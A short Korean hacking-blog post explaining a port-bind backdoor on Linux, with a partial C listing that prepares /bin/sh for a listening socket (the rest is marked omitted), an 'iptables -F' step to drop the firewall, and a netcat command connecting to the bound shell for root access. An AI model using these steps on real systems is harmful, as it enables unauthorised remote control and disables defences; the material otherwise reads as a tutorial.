* 여기에 기술된 내용을 보고 악의적인 이유로 이용할 시 법적 책임은 자신에게 있습니다.
Portbind는 소켓 통신에 대해 지식이 필요합니다.
소스 코드에 대해 따로 설명을 붙이지 않습니다.
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <stdio.h>
int main()
{
int clientfd,sockfd;
int dstport = 12345;
char *hack[2];
hack[0] = "/bin/sh";
hack[1] = 0;
struct sockaddr_in mysockaddr;
소스코드 생략...
동작원리는
공격받는 컴퓨터에서 특정 포트를 열고 대기하는 상태로 두며
공격자는 외부에서 열린 포트로 접속하게 되면서 관리자 권한을 얻는 원리입니다.
먼저 방화벽을 내립니다.
iptables -F
위의 소스로 만든 프로그램을 실행하면 이렇게 대기 상태가 됩니다.
이제 접속을 해보겠습니다.
해당 리눅스에서 관리자 권한을 가지게 되었습니다.
NetCat 명령어
실행파일 접속할 아이피 포트 번호
nc 111.111.111.111 5555
'Hacking > System Hacking' 카테고리의 다른 글
Backdoor - Netbus (트로이목마) (2) | 2019.09.26 |
---|---|
Backdoor - NetCat (리버스 텔넷) (0) | 2019.09.26 |
Linux Setuid(권한 상승) (0) | 2019.09.26 |
john the ripper (linux 계정 크래킹) (0) | 2019.09.26 |
Unsecure (FTP 크래킹) (0) | 2019.09.26 |